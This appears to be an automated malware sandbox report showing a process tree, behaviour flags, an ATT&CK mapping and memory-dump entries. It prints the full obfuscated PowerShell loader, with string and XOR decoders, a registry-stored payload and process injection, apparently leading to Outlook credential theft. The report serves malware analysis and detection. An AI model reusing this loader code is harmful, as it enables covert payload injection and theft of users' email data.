Di'Fo6Ic3Bi0Un0Uf2LiBLa2Be2Op2Bo3Sk3Bu4Ud6Me9Ji0Wh3Uk2Fa2Ko2Ex1Ac2MaEPa2ov9Te2Ex2Br0OvARe2Ge2Gr3Mi3La2UrFRe2Ki8wo2Sn3Is6MoFPr6Ti3Gt0Me4Aq2SeFwe3Tk5Ko2AfETe3ve4Em3Ma3Di2KlESe2Un6Su2No9Pa2Ab2Ha7Kr5Te6HaBWa6De7Pr6Au3Sy0In4Re2SiFGa3Co5Wr2RoEIn3Ba4Ma3Be3Ba2moEPe2Af6Sp2Ru9Ov2Fi2Su7Ha4Po6ImBom6Sk7Co6Gu3Bi2LiEUr2Be9Ui3Ea4Ro2Fl6Dk2ChBBu3Fe2Un2Ex5No3So5ta2CoEDa2In8Sh3Un2Fa3Ma4Pi2DeBOv3UnESh6FeBun6Af7Se6Ma3Ga0Lu8Pr3in7Pl3Wo4Sa3Le3Cr2DrELa2MaBMo2DeBSt2In2Am2Sl3He2Sa2Af3Im4Da6BoEBr6Pa9Ra1th4Si2Wi2Ju3Sa3De0MiECo2TeAGa3Ac7Sl2CeBPi2Be2Pe2AgAto2Ca2No2ta9Wa3Ac3Be2Un6Op3eg3Un2AlEAn2St8Gr2Sn9Kr0Em1qu2KnBun2Di6Re2Kr0Fi3Al4Bu6MiFSi6An3Om0Ts9Re2Al8Le2SkENa3re4Ac2Tu2Te7Le6Ko7Me5Ho7Mo1Un7Ho0Ob6SkEMo'Su;ju&Me(ga`$DiCEnhAgrgeiFisPrtGuiTeaUnnTeeFl7Hi)Sk Un`$NoEPrvDuaUtnKagsteAflUniVisuntBuaGerQuiTiuSamSc4Aa;De`$MaEThvInaUnnSagArestlKaiSesintRaaHirFoiReuOnmFo5Ur Al=Ge SlHSlTEmBPu Un'Te3Qu5St2Pa2Ma3ni3Am3Ki2Br3Ir5Gi2Ov9Ex6Ma7Zs6li3Cy0Ev0To2HaBOp2Un2Cy2Tr3An3Ho4Ry6De9Rh0Re4Ok3In5Pa2St2Sh2Rn6Uk3Go3Mo2Bi2Pr1Tr3Tr3MoETy3Sp7Tw2ak2Fu6YeFAr6SkETr'Fo;pe&Ud(An`$RoCSahSerPiicosBatSaiMoaScnDheve7zo)Sy Fu`$UnEAtvTraWanCogKieBolReiPrsHatDeaFlrBaiDouKomDa5Ko Pu Pl Ad;gr}ti`$IsgInrStnMatSteLytBe Co=An OdHSnTDvBCo Ov'Ov2FiCTo2Cy2Su3Am5Po2Pl9Oo2Fo2ma2IrBBi7No4Ac7Fl5Te'Br;St`$SuELivSuaFrnBrgMeeChlOpiSesKotSeaAlrGiiSauVemLo6Me Ar=Pe DiHUfTKoBCa Ef'Ru6Ti3Fe1Er3Un3Ag5Al2Ph6Pt2Be9Bl3Li4Re3St7In2Ps6Ta3An5Re2Ar2Fo2bo9un3Sm3sa2Il2Kv3Kh5Un6Ep7Ln7foADa6Ka7Un1LeCOv1Fo4Za3siEFo3sh4Fe3Ce3Ma2St2Pr2BeAFe6Vi9Ir1Cr5Ra3Ba2Ly2Sy9De3pr3Se2PaEPi2UrAGl2Ov2Re6Ge9Co0MiETh2La9Ge3Sc3Vo2Am2Sp3Un5Sc2Ca8Ly3St7Pa1So4Ci2Sk2Co3Se5Be3Sk1Un2PsESu2Sn4Vi2bi2He3Ma4Ur6Er9Su0BeAEn2Pu6Bt3Br5Zo3Ak4si2LoFBl2Kj6ki2TiBUl1ExAOr7RyDBa7EkDEf0Un0Ud2Br2Ab3Ya3br0Ob3Fr2Ci2Ch2IsBDi2Sl2Sl2Th0Ri2En6ac3Cl3Ko2Ty2In0Le1Ta2Di8Sk3Bo5Ma0Te1De3Gr2In2Sk9nd2Br4Re3Ej3Ta2LoEMu2Pr8Mo2Ga9Ki1Ek7Me2Di8Br2MiEbi2Ad9Ka3Sp3En2Hi2Pr3Ex5Cy6CaFTj6BaFAn2Po1Mi2MiCHy3Da7Ri6Of7Un6Pa3Ji2St0op3El5Ti2fo9St3Re3Fr2Ki2Re3br3En6Fa7Br6Be3Wi0Re4Fo2TrFHj3Hv5Ku2OvEab3Pi4An3Ha3Ku2ToECr2ci6Kl2Un9Fe2Af2Er7Be3Se6InEpi6PeBMa6La7Tr6SpFEf0Tu0rh0Sp3Si1mu3Na6Mi7Am0Ko7Tt6SaFOv1UnCSo0LeEUn2Pr9Di3Id3Pl1Ta7Fo3Di3Ti3Ku5Ba1PhANo6JoBIn6Un7bu1NoCpr1st2Un0MaEKo2nd9To3Fa3Op7Ha4Tj7Ja5He1MsABl6FrBRe6St7Ud1ArCre1Un2Ad0FlEAt2Al9Ko3Be3Tr7Mo4Sc7Ca5Al1TwAMa6UdBst6Un7Fi1FrCDa1No2Ri0maEUn2Le9St3Di3Ov7Fo4fr7Pe5Ka1ShAIn6EcEHe6Un7Em6OxFCa1AtCko0PrECo2Ba9No3Re3Ca1Hv7Sa3re3Tv3ga5De1LeAPl6CuETo6FeEPr6HaELa'Ne;re&Fe(Mi`$FoCBahMarRuiArsZytCoiMaaRhnHjehk7Hj)Ts Pr`$PjESivlbaPrnMigOxeKllHaiDosTetreaSkrAniDauDymSk6Mo;ex`$AkLOroBexProUndSaoUnnUdtHa Op=tu SufWikPopAf Lo`$udCArhSprHoiUisHvtEkiUnaNonKeeCo5Af fo`$thCPuhDyrsuitesprtIniQuaMenSteEu6Ve;Je`$UnEFovFoaAcnGagSoeWalPaiTisIstCeaKaraniKouBomSv7Pe St=Fe SnHArTBuBid Af'Sy6No3Ti2Sp2ra3Sm2Hn3So5st3FrEBi2Vo4Se2TrFTr2Kn8Kn3An5In2GoEKv2Fr4At7Op4Sy6Li7Ti7toAAr6Sl7Ne6Mi3Ps1Em3Fo3Ne5in2Pr6Ov2Le9Se3Rh4St3Sp7At2Ca6Re3Af5Jt2tr2Fo2Po9Tr3Un3Ba2Pr2Je3En5Li6Me9Pe0BeESy2In9Fi3An1Ba2Ba8As2TeCDe2Ex2In6UnFHj1SeCRi0TrECe2Je9Ai3Me3Ac1re7en3Mi3Ro3Ad5Uk1BrASl7SoDUn7HvDpo1ReDMo2Cm2La3Gy5Ba2Oo8El6PeBEf6Po7Ka7Pa1Sy7Br2Ti7Pr6Ai6TiBTo6Sp7Ac7No7Ge3InFCo7So4To7Fy7Ma7Va7Po7Mo7Cr6SaBBi6Ho7In7se7kn3ChFGl7Po3Be7Un7Cr6PrECe'Ha;Be&Fl(Bl`$arCCohCrrOpiPysNotApiEmaStnCieSl7Si)Us Pr`$PrEPbvKnaAbnOugOmeAdlChiHosMatDiaSnrKoiSeuCamVa7Vi;no`$ObESpvNiaAlnDigVieUdlCoiCosShtOpaEvrVaiUnuKomLa8Me Af=Er FoHDrTPiBPr Gl'Po6Mi3Ba0Xa9Be2Ud2Pr3In2Fo3Ka5An2At6Ba3Id4Ud3Ci3Ta2LeFSe2re2Gu2Hj9Io2AnEba2le4Ry3Dr4Kn6Fa7Pr7BrAFi6Ju7Ug6Pl3Am1Em3Fu3Li5Ac2Di6Un2Rm9Sy3Au4Pr3fe7Ni2Co6Mo3Sc5Ka2Sa2Re2Fo9De3Pa3Ha2Hy2sn3Fl5Da6Ru9St0PmESu2Di9su3Ha1Co2Sa8De2FoCVs2Ls2Me6SpFRe1SuCOr0TiECo2Ti9Vr3My3Sv1Ge7pr3Be3Gr3Ha5Mu1ReASv7StDSt7SrDAr1HyDKo2Bu2In3Lu5Fu2Pi8Pr6ReBPr6Pe7hv7Ud6Ca7Jo7gr7No7Ke7Bo2Tl7ToEPr7Fr0Hu7Di0An7Pr1Ka6ToBov6Ta7Sl7Pe7Pa3BoFZo7Ve4Pa7Fa7Be7Sp7Re7Ic7Ka6DiBCr6Ov7ma7Sw7Un3HaFSh7fi3Su6miEMi'Fe;St&Os(Dr`$NoCLehHorHaiSosUstHyiPlaUtnOaeFl7Tv)Ko Ka`$LiEInvTjaUsnChgPeeMelSpiNosMatSpaKvreniSauMamPr8Sw;Be`$GrAExzSsiRumUdiKonCooDybExeSenmazAsestnOmeUn=Ra(MiGBoeTatSl-NeIFutareCymOuPHarbloKopsteskrKatNeyHo ha-StPunaCetAnhCa Ex'OuHSkKBoCSkULi:Wh\StTAuoAgmmieSynIntCy\TufProPrrMuvdaiOmkMolFoiRenCegBeeTarPonPaean'Do)St.CaSLihBriPobOvbQuoGelFoeUdtShtHeeTurPanHleBysCo;De`$LiESkvHjastnSpgPheGelFoidosBatChaSkrSaiReuStmCo9Va Bo=Du UnHinTErBTh Ch'Pa6Ro3Do0Ma2Bl3Im1As2Ru6Re2Rh9Mi2Ha0Jd2Be2Ge2seBLu2NeENe3La4ta3et3Re2Su6Ob3pa5Ch2skEGu3Ge2Hy2MeADk6Ka7Go7FeAte6An7Ia1OoCNy1Ti4Ki3fiEMi3Di4Sl3ny3No2St2Ri2BaASn6Ha9Sm0Kl4Sl2Pa8Mo2sc9Sp3Ra1Un2Fa2Gn3Vi5Sc3no3Wi1ClAuk7CoDTi7ToDBo0Bo1Fr3Fu5Sa2ra8Sv2FlAEk0te5Ru2He6Bu3So4Sa2Ma2Kr7Bg1Ad7sp3Fo1Ca4Th3Co3Sa3Fo5Re2MiEVo2Al9Ot2Pe0Pe6RoFPo6No3Be0Is6En3MyDSa2QuEUn2TaAAm2DiERe2Fl9Na2Ra8sa2Sk5Kv2Pi2Ty2Ep9Dy3OpDTv2Pr2Co2Ko9Ge2No2Ga6UnESe'Un;Va&Fo(Fl`$OsCTuhSerFoiHasArtbriBuaTynSkeIs7Ve)Tu Pr`$TuEAdvLuaDinTigSeeUnlDoiNisRitudaScrHuiFruMamPa9Sk;ta`$TrASozMiiStmFoiSenHioCabTieDrnStzMaeAmnSieLi0Su Iz=Dr ChHUrTekBSc bi'Fy1foCLs1Eu4sh3KeELa3Te4Fr3Ga3Ko2Fo2Su2SuADi6Ca9Be1Ud5Sa3mi2Sy2Di9Fi3Vr3Cl2UdEUr2ByAGa2Wa2tr6Bo9Cr0KnEMo2Me9Hy3Sc3Fr2Si2Sc3Un5Sn2Fa8Su3Ce7Cr1Po4Gy2Ud2Be3Ar5Vi3Fe1lg2SkETe2Da4Ta2Lu2ov3ge4Br6no9Ru0OlASt2We6Di3Hy5Ce3Po4Ru2AbFIn2In6bo2UnBWo1GiATa7MyDOv7CaDAt0Ca4Sp2Ek8Sl3Ma7Re3CoEFr6CoFli6Se3am0Po2Ra3Ci1Ba2Ba6Fa2Da9He2In0Fr2Tr2fo2FlBAl2VeETi3As4To3Ca3Mo2Is6Am3Sn5Ko2WrEBr3se2op2FrAOr6HoBSh6Me7De7So7Ru6foBCh6Ut7La6Ho7Ma6De3ju2To2Pa3Ne2Pr3In5Rv3UnEJe2Ki4No2ReFCo2Ra8Ra3Mo5ho2BiEsl2Un4Tr7pl4sk6PaBLa6Ba7Dd7Sa1bo7In2Ec7zi6Sk6CoEva'Kr;Me&un(Co`$VeCGuhRarRiiVasaltOriAsaalnFoeCh7Sy)Pa Be`$FoAAezNaiTemEsiBanInoSebEleManRezNoePenAleAm0Fa;De`$NoIRanAddKasDjeSanUddSltSieOl=Sk`$KaEPovZeaStnMagUneDrlBeiSospotUnaPrrLaiSturemUn.VecTjoAruAdnSotMi-St6Ba5Pu1En;Co`$TrAElzSeiBlmExiSenFooMubBlePrnNozToeSlnStekn1Go Sv=Rk SeHAlTSaBDa As'In1GuCTi1Fu4na3CoEEf3Af4Ti3Te3Ko2In2Ha2HiAOv6Ma9Ol1ej5Ka3Tr2Ko2Cr9Ta3Up3Li2BiEhe2PeAEs2El2Se6Fo9Kl0CoEOr2Un9Lo3Fl3ni2gl2St3Fo5Ha2Im8Tu3Fu7Un1Fl4Gl2Vi2Fu3Di5Sa3Ar1do2ToEud2An4Yo2At2Bl3Po4Ta6In9Pr0DuAAi2su6st3Fd5Re3Ha4Ud2geFhe2Bu6Da2stBCo1DeAHu7IsDSk7ZuDmo0Ox4An2Is8Se3Ex7Un3DiESu6InFHv6Fa3Ku0st2Va3Ch1Ba2By6Pa2Sa9So2Yo0Dy2Su2De2NoBfl2LoELa3In4In3St3Ex2Pa6Sl3La5Fa2PhEUn3Da2Vi2TrATs6DeBGe6An7Be7Dr1No7Ch2Ey7Ea6Ho6TeBSa6Li7Wr6so3Sk0Mi9Br2Fo2Do3Ss2Tr3So5Sy2ac6Op3Du4Pu3Ne3Lu2PrFBr2So2Pi2Tr9Fl2ViEAn2te4Se3Av4Me6UrBEx6Ry7Su6Rd3Co0BaEEn2Al9An2Ri3Co3Sp4Sq2Se2De2An9Ra2Gy3Un3Bl3Fo2re2Be6PoESk'Gr;Pa&Ef(Us`$BiCHahRarBliDrsprtKuiSaaSpnHaeMe7Ri)Di cl`$UmAPrzaristmFliPrnDdoMibKnetrnLazPaeMenLieTh1St;Gu`$LsADizCoiUdmBriBandeoSobIneSpnZozUneHanUpeKo2To ty=Th KrHStTOfBSp Af'La6Fo3Ch1Ur4Do2OrCAn3As5Fg3en2Pa2Di2Sk3kr4Ud3Pr3Bl2ClEEu2huCam3Ut4Un6Ka7Li7prAMu6Ma7Fa1coCCr1Di4Fo3foEMy3Be4Ka3Sn3Pr2Re2Ko2CaAGr6Re9Un1Fo5Br3ov2Br2Ge9Ho3Li3Ma2IdEBr2jeACo2De2Ri6St9Du0ceENa2in9Ai3Ki3So2En2En3In5im2Xe8Cy3In7Br1Be4kl2Ta2Ar3Ti5ae3Ca1Bl2HeEHu2Ne4Sp2Sk2Su3En4Cr6Ke9In0NgAFr2Gr6Ja3Hi5Pu3Pr4Ze2saFTi2Rk6He2SkBPr1GlAFo7SmDMa7NaDFo0In0Em2Sh2Wa3Bo3St0Hu3Bu2Sk2Ek2PaBCo2Ka2Op2Un0At2He6Sa3Po3Qu2Mi2Sp0Te1Pl2Sa8Tr3St5Li0Mo1Ph3Ov2un2Ch9ga2Ax4Lu3Me3No2InEEn2St8Re2Af9Ro1lo7Ta2Tr8Fl2FaEMi2Aa9In3Un3Or2Ny2Sk3Se5Sl6TeFSn6PoFpr2Sk1Br2HaCFr3Ra7In6gu7Pe6Su3Da0Be4Co2Di6Ud2Sc5Sp2snELg2Ho9Sy2Cl2vi3Sh3Af3Pe0Pa2Fa8Sp3Su5Sh2RaCEk3Ov4Kr6Ga7Fo6Ho3Cy0Kl0Mo2Pa2Un2Lb9Tr2Po1Ka2Yn8Af3Re5si3Ar3Ch2IrBDr2KoBRe2Pr2Ud6AnECa6FeBIs6Be7An6UnFMa0Ar0sl0Il3Gu1Un3Sk6Pa7St0Un7Ov6CoFMa1MoCUp0alEvi2Re9Kr3Up3Mu1Me7Ko3Fo3Tr3cu5Au1FdADr6SmBPr6Do7No1BiCTe0LoEVi2Co9Yi3Di3Ps1Mo7Fo3Ns3Si3De5bo1NoAKy6GrBli6St7Li1HyCFr0ReEBu2An9Gr3Re3sm1Mo7Pe3Ti3Lo3Kr5An1MiASe6BoBFa6Ch7ba1MoCUn0CoESt2Ac9Kr3rg3Di1Pr7At3Sa3Mi3Sn5Pr1giASe6BeBFl6Gr7Af1SpCko0enEPs2Ci9Ne3No3Ve1Re7Me3Ak3Da3Sa5Fa1PoAUn6GoECo6Co7Gl6ReFFo1FoCsk0LaETi2St9El3Po3hj1Po7Fe3Te3In3su5vi1RaAFl6IvEst6frETe6TrEMa'Di;gg&Ex(Fe`$ShCPahNerDoiBasEltaciElaEvnSueBa7Se)Fr Ha`$SrACozGeiKkmmaiGunSpoTibReeVenHezUnePanWieSc2no;pi`$BeABuzSniSpmDeiSnnFooSobFreAmnLyzbaeThnCreFe3La Al=Po ReHBlTShBDa In'Se6Bo3Ba1Sk4Se2GeCBl3Eu5Pr3Pl2re2Sd2Le3Ku4Kl3Bi3Fr2SeEAs2GaCRu3Ka4Un6Al9Sg0AfETa2An9In3Da1Or2Sa8In2InCNe2Rh2St6OnFFr6Ta3to2Pr2El3de2De3Er5Ca3MuEEr2Ja4Tr2UmFDa2Fr8De3Li5An2DeEPu2Sp4Di7Fo4St6WhBSt6Or3Te0An9pl2Va2Li3Ga2Pu3An5kr2Ov6Tr3Zo4Fo3Ha3Uh2CaFJe2Lu2Sl2mi9Co2NoEMi2Bo4Ba3La4He6FaBFr6To3Tr0JuBOp2Lu8Pi3HoFFo2Do8Ja2Fi3Ca2Pe8Me2Un9Br3Fa3Sa6KoBHv7En7Sk6UdBNe7Kj7Os6InEPr'Br;Fl&Su(Se`$SrCCahUdrPaiRusUntRiiCaaHunSoeDa7Za)Re Ra`$PeALezOuiFumViiFanCooKrbKoeUdnPozCheKanReeHa3Vi#Un;""";Function Aziminobenzene9 { param([String]$Berthed); For($pharaohs=2; $pharaohs -lt $Berthed.Length-1; $pharaohs+=(2+1)){ $Raafrugts = $Raafrugts + $Tyrannophobia + $Berthed.Substring($pharaohs, 1); } $Raafrugts;}$Limpidity0 = Aziminobenzene9 'DiIBoEReXSu ';$Limpidity1= Aziminobenzene9 $pretincture;if([IntPtr]::size -eq 8){START-job { param($gagmen) powershell $gagmen } -RunAs32 -Argument $Limpidity1 | wait-job | Receive-Job;}else{&$Limpidity0 $Limpidity1;};;;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2028

\??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Berthed); $Skydedrs = $Berthed.Length; $Recommending = New-Object byte[] ($Skydedrs / 2); For($pharaohs=0; $pharaohs -lt $Berthed.Length; $pharaohs+=2){ $Recommending[$pharaohs/2] = [convert]::ToByte($Berthed.Substring($pharaohs, 2), 16); $Recommending[$pharaohs/2] = ($Recommending[$pharaohs/2] -bxor 71); } [String][System.Text.Encoding]::ASCII.GetString($Recommending);}$Noise1260=HTB '143E3433222A69232B2B';$Noise1261=HTB '0A2E2435283428213369102E297475691229342621220926332E31220A22332F282334';$Noise1262=HTB '0022331735282406232335223434';$Noise1263=HTB '143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B22152221';$Noise1264=HTB '3433352E2920';$Noise1265=HTB '0022330A2823322B220F2629232B22';$Noise1266=HTB '1513143722242E262B09262A226B670F2E2322053E142E206B671732252B2E24';$Noise1267=HTB '153229332E2A226B670A262926202223';$Noise1268=HTB '1522212B222433222303222B2220263322';$Noise1269=HTB '0E290A222A28353E0A2823322B22';$Christiane0=HTB '0A3E03222B2220263322133E3722';$Christiane1=HTB '042B2634346B671732252B2E246B671422262B22236B670629342E042B2634346B6706323328042B263434';$Christiane2=HTB '0E2931282C22';$Christiane3=HTB '1732252B2E246B670F2E2322053E142E206B67092230142B28336B67112E353332262B';$Christiane4=HTB '112E353332262B062B2B2824';$Christiane5=HTB '2933232B2B';$Christiane6=HTB '093317352833222433112E353332262B0A222A28353E';$Christiane7=HTB '0E021F';$Christiane8=HTB '1B';$Cabinetworks=HTB '121402157475';$Genfortlle=HTB '04262B2B102E292328301735282406';function fkp {Param ($Tormentillen, $Robing) ;$Evangelistarium0 =HTB '63012B262A2A22342C3522337077677A676F1C06373703282A262E291A7D7D0432353522293303282A262E2969002233063434222A252B2E22346F6E673B67102F2235226A08252D222433673C67631869002B2825262B063434222A252B3E0426242F22676A062923676318690B282426332E28296914372B2E336F63042F352E34332E2629227F6E1C6A761A69023632262B346F6309282E3422767571776E673A6E69002233133E37226F6309282E3422767571766E';&($Christiane7) $Evangelistarium0;$Evangelistarium5 = HTB '63172626342C3E292322292322767573677A6763012B262A2A22342C3522337077690022330A22332F28236F6309282E3422767571756B671C133E37221C1A1A67076F6309282E3422767571746B676309282E3422767571736E6E';&($Christiane7) $Evangelistarium5;$Evangelistarium1 = HTB '3522333235296763172626342C3E292322292322767573690E2931282C226F6329322B2B6B67076F1C143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B221522211A6F0922306A08252D22243367143E3433222A69153229332E2A22690E293322352837142235312E242234690F2629232B221522216F6F0922306A08252D222433670E29331733356E6B676F63012B262A2A22342C3522337077690022330A22332F28236F6309282E3422767571726E6E690E2931282C226F6329322B2B6B67076F631328352A2229332E2B2B22296E6E6E6E6B67631528252E29206E6E';&($Christiane7) $Evangelistarium1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $Opstilledes,[Parameter(Position = 1)] [Type] $insalubriously = [Void]);$Evangelistarium2 = HTB '63002B222334677A671C06373703282A262E291A7D7D0432353522293303282A262E29690322212E2922033E29262A2E24063434222A252B3E6F6F0922306A08252D22243367143E3433222A691522212B2224332E282969063434222A252B3E09262A226F6309282E34227675717F6E6E6B671C143E3433222A691522212B2224332E282969022A2E3369063434222A252B3E05322E2B2322350624242234341A7D7D1532296E690322212E2922033E29262A2E240A2823322B226F6309282E34227675717E6B676321262B34226E690322212E2922133E37226F63042F352E34332E262922776B6763042F352E34332E262922766B671C143E3433222A690A322B332E2426343303222B22202633221A6E';&($Christiane7) $Evangelistarium2;$Evangelistarium3 = HTB '63002B222334690322212E292204282934333532243328356F6309282E3422767571716B671C143E3433222A691522212B2224332E28296904262B2B2E2920042829312229332E2829341A7D7D14332629232635236B6763083734332E2B2B222322346E691422330E2A372B222A22293326332E2829012B2620346F6309282E3422767571706E';&($Christiane7) $Evangelistarium3;$Evangelistarium4 = HTB '63002B222334690322212E29220A22332F28236F63042F352E34332E262922756B6763042F352E34332E262922746B67632E2934262B3225352E2832342B3E6B6763083734332E2B2B222322346E691422330E2A372B222A22293326332E2829012B2620346F6309282E3422767571706E';&($Christiane7) $Evangelistarium4;$Evangelistarium5 = HTB '3522333235296763002B22233469043522263322133E37226F6E';&($Christiane7) $Evangelistarium5 ;}$grntet = HTB '2C223529222B7475';$Evangelistarium6 = HTB '6313352629343726352229332235677A671C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D00223303222B222026332201283501322924332E282917282E293322356F6F212C3767632035293322336763042F352E34332E262922736E6B676F00031367076F1C0E29331733351A6B671C120E293374751A6B671C120E293374751A6B671C120E293374751A6E676F1C0E29331733351A6E6E6E';&($Christiane7) $Evangelistarium6;$Loxodont = fkp $Christiane5 $Christiane6;$Evangelistarium7 = HTB '632232353E242F28352E2474677A676313352629343726352229332235690E2931282C226F1C0E29331733351A7D7D1D2235286B677172766B67773F747777776B67773F73776E';&($Christiane7) $Evangelistarium7;$Evangelistarium8 = HTB '63092232352634332F22292E2434677A676313352629343726352229332235690E2931282C226F1C0E29331733351A7D7D1D2235286B67767777727E7070716B67773F747777776B67773F736E';&($Christiane7) $Evangelistarium8;$Aziminobenzene=(Get-ItemProperty -Path 'HKCU:\Toment\forviklingerne').Shibboletternes;$Evangelistarium9 = HTB '630231262920222B2E343326352E322A677A671C143E3433222A69042829312235331A7D7D0135282A0526342271731433352E29206F63063D2E2A2E29282522293D2229226E';&($Christiane7) $Evangelistarium9;$Aziminobenzene0 = HTB '1C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D0428373E6F630231262920222B2E343326352E322A6B67776B6767632232353E242F28352E24746B677172766E';&($Christiane7) $Aziminobenzene0;$Indsendte=$Evangelistarium.count-651;$Aziminobenzene1 = HTB '1C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D0428373E6F630231262920222B2E343326352E322A6B677172766B6763092232352634332F22292E24346B67630E29233422292333226E';&($Christiane7) $Aziminobenzene1;$Aziminobenzene2 = HTB '63142C35322234332E2C34677A671C143E3433222A69153229332E2A22690E293322352837142235312E242234690A2635342F262B1A7D7D00223303222B222026332201283501322924332E282917282E293322356F6F212C3767630426252E2922333028352C346763002229212835332B2B226E6B676F00031367076F1C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6B671C0E29331733351A6E676F1C0E29331733351A6E6E6E';&($Christiane7) $Aziminobenzene2;$Aziminobenzene3 = HTB '63142C35322234332E2C34690E2931282C226F632232353E242F28352E24746B63092232352634332F22292E24346B630B283F28232829336B776B776E';&($Christiane7) $Aziminobenzene3#"
4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
5⤵
- Checks QEMU agent file
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1072

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
83b2e5704f74b98a42ca29b1e1ef694c

SHA1
b6dca45cf867251d96cf34c710b26071241390b4

SHA256
7a2b043c2c5b167e2da61835bd25cdcbf09357860bf2fd76a763cdc85a7486c9

SHA512
bc1f2d90c9d8f7bf0d5d91ab07f08aa43909491ca593afba036c5451f25d5b8448a7286f55841ed475456be85d42aa733538c54dfe3a871cda19e6eb0e13b569

Download Submit
memory/840-85-0x0000000072D50000-0x00000000732FB000-memory.dmp

Filesize
5.7MB

Download
memory/840-65-0x0000000000000000-mapping.dmp

Download
memory/840-73-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/840-74-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/840-92-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/840-91-0x0000000005C80000-0x0000000006618000-memory.dmp

Filesize
9.6MB

Download
memory/840-86-0x0000000005C80000-0x0000000006618000-memory.dmp

Filesize
9.6MB

Download
memory/840-69-0x0000000005C80000-0x0000000006618000-memory.dmp

Filesize
9.6MB

Download
memory/840-75-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/840-68-0x0000000072D50000-0x00000000732FB000-memory.dmp

Filesize
5.7MB

Download
memory/1072-87-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1072-81-0x0000000076D10000-0x0000000076EB9000-memory.dmp

Filesize
1.7MB

Download
memory/1072-88-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/1072-72-0x0000000000AB768E-mapping.dmp

Download
memory/1072-90-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/1072-93-0x0000000000AC0000-0x0000000001458000-memory.dmp

Filesize
9.6MB

Download
memory/1072-82-0x0000000076EF0000-0x0000000077070000-memory.dmp

Filesize
1.5MB

Download
memory/1072-76-0x0000000000AC0000-0x0000000001458000-memory.dmp

Filesize
9.6MB

Download
memory/1396-64-0x0000000072D50000-0x00000000732FB000-memory.dmp

Filesize
5.7MB

Download
memory/1396-84-0x0000000072D50000-0x00000000732FB000-memory.dmp

Filesize
5.7MB

Download
memory/1396-63-0x0000000075DF1000-0x0000000075DF3000-memory.dmp

Filesize
8KB

Download
memory/1396-61-0x0000000000000000-mapping.dmp

Download
memory/2016-54-0x000007FEFB731000-0x000007FEFB733000-memory.dmp

Filesize
8KB

Download
memory/2028-80-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/2028-57-0x000007FEF3AA0000-0x000007FEF44C3000-memory.dmp

Filesize
10.1MB

Download
memory/2028-83-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/2028-59-0x00000000027B4000-0x00000000027B7000-memory.dmp

Filesize
12KB

Download
memory/2028-55-0x0000000000000000-mapping.dmp

Download
memory/2028-62-0x00000000027BB000-0x00000000027DA000-memory.dmp

Filesize
124KB

Download
memory/2028-60-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/2028-58-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp

Filesize
11.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads